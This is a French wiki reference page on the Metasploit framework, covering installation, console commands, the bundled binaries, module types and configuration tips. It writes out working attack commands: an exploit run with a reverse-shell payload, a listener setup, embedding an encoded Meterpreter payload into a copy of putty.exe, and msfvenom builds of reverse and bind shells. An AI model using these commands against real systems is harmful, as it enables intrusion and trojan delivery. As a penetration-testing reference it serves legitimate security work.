Metasploit
De Linuxmemo.
Ligne 1 : | Ligne 1 : | ||
[[Catégorie:Logiciel]] | [[Catégorie:Logiciel]] | ||
+ | [[Catégorie:Securite-outils]] | ||
(voir [[meterpreter]]) | (voir [[meterpreter]]) | ||
==Installation== | ==Installation== |
Version du 3 avril 2013 à 20:32
(voir meterpreter)
Sommaire |
Installation
apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems apt-get install git apt-get install build-essential ruby-dev libpcap-dev apt-get install rubygems libmysqlclient-dev
support mysql:
apt-get install mysql-server apt-get install rubygems libmysqlclient-dev gem install mysql apt-get install msgpack-python
gem:
apt-get install libxslt-dev libxml2-dev gem install bundler Dans le rep du Gemfile bundler install
shell
help, info, set, show et use.
show exploits search use windows/http/savant_31_overflow show options set RHOST 192.168.1.5 show targets set TARGET 0 show payloads set PAYLOAD windows/shell/reverse_nonx_tcp show options exploit
show options Affiche la liste des options et valeurs courantes (celles spécifiées avec la commande set)
show exploits Affiche la liste des exploits
show targets Affiche la liste des cibles
show payloads Affiche la liste des payloads disponibles
show advanced Affiche les options avancées
search
Keywords:
edb : Modules with a matching Exploit-DB ID bid : Modules with a matching Bugtraq ID cve : Modules with a matching CVE ID author : Modules written by this author port : Modules with a matching remote port path : Modules with a matching path or reference name type : Modules of a specific type (exploit, auxiliary, or post) platform : Modules affecting this platform name : Modules with a matching descriptive name osvdb : Modules with a matching OSVDB ID app : Modules that are client or server attacks
Examples:
search cve:2009 type:exploit app:client
Binaires
http://www.offensive-security.com/metasploit-unleashed/Main_Page
- msfbinscan (outil rapide pour déterminer la vulnerabilité d'un binaire a une faille donnée)
./msfbinscan -i [DLL] |grep -P "^Size "
- msfcli (Client mode script)
./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=9030 LHOST=192.168.0.10 E
- msfconsole (Console)
- msfd (daemon Utilitaire qui ouvre le framework Metasploit pour l'accès distant)
- msfelfscan (outil de développement)
- msfencode (Camouflage des payload dans fichier en changeant la MD5)
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -x /var/www/putty.exe -o /var/www/puttyx.exe
- msfgui (Interface graphique)
- msfmachscan (outil de développement)
- msfpayload (Injection de playload dans fichier (exe, doc ...))
./msfpayload -l ./msfpayload windows/shell_bind_tcp O ./msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 C
- msfpescan (outil de développement déterminer le type de retour pop/pop/ret avec adresse fournie)
./msfpescan -D -a 0x767a38f6 win2000sp4.umpnpmgr.dll
- msfrop (outil de développement Return Oriented Programming (ROP) anti Windows "Data Execution Prevention" (DEP) a la recherche des "gadgets")
./msfrop -v metsrv.dll
- msfrpc (Client rpc)
./msfrpc -S -U msf -P msf -a 127.0.0.1
- msfrpcd (Daemon rpc)
./msfrpcd -U msf -P msf -f -S -a 127.0.0.1
- msfupdate (Mise a jour automatique en ligne)
./msfupdate
- msfvenom (combinaison de msfpayload et msfencode en une seule commande)
msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT DE SORTIE> > nomdefichier ./msfvenom --help-formats Executable formats dll, exe, exe-small, elf, macho, vba, vba-exe, vbs, loop-vbs, asp, aspx, war, psh, psh-net Transform formats raw, ruby, rb, perl, pl, bash, sh, c, js_be, js_le, java
./msfvenom -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3
./msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/jmp_call_additive LHOST=<NOTRE IP> | msfvenom -e x86/shikata_ga_nai -a x86 –platform windows -f exe > meter.exe
Arborescence des modules
Auxiliary La version 3.0 supporte le concept de modules auxiliaires qui peuvent être utilisés afin d'exécuter des actions arbitraires telles que le scan de ports, le déni de services entre autres. (Unlike exploit modules, auxiliary modules do not have a payload.)
Encoder
Exploit Les modules "Exploit" sont les modules principaux dans Metasploit.
Nop Les modules NOP sont utilisés pour les instructions de type "no-operation" pour exploiter les débordements de buffers.
Payload Les charges utilies (Payload en anglais) sont des portions de code (shellcode) exécutées lorsque l'exploit réussi. Les charges utiles permettent d'assurrer la communication entre Metasploit et la victime.
- (voir meterpreter)
Nessus
load nessus
Metasploit Community Edition
http://www.rapid7.com/products/metasploit-community.jsp
NeXpose
http://www.rapid7.com/vulnerability-scanner.jsp
Astuces
- db_connect automatique:
vim database.yml production: adapter: postgresql database: msf username: msf password: host: 127.0.0.1 port: 5432 pool: 75 timeout: 5
sudo echo export MSF_DATABASE_CONFIG=/usr/local/share/metasploit-framework/database.yml >> /etc/profile
- fichier de ressources
1-creation de fichier de commandes "monfichier.rc"
2-chargement du fichier de commandes avec "resource"
msf > resource monfichier.rc [*] Processing monfichier.rc for ERB directives. resource (karma.rc)> db_connect msf3:PASSWORD@127.0.0.1:7175/msf3
- meterpeter derrière 2 routeurs nat:
- les données télécharger sont stockées dans ~/.msf4/nom_module
- l'historique des commandes est dans ~/.msf4/history
- problème avec pcaprub bien souvant non compilé sur le système:
cd /opt/framework3/msf3/external/pcaprub ruby extconf.rb make make install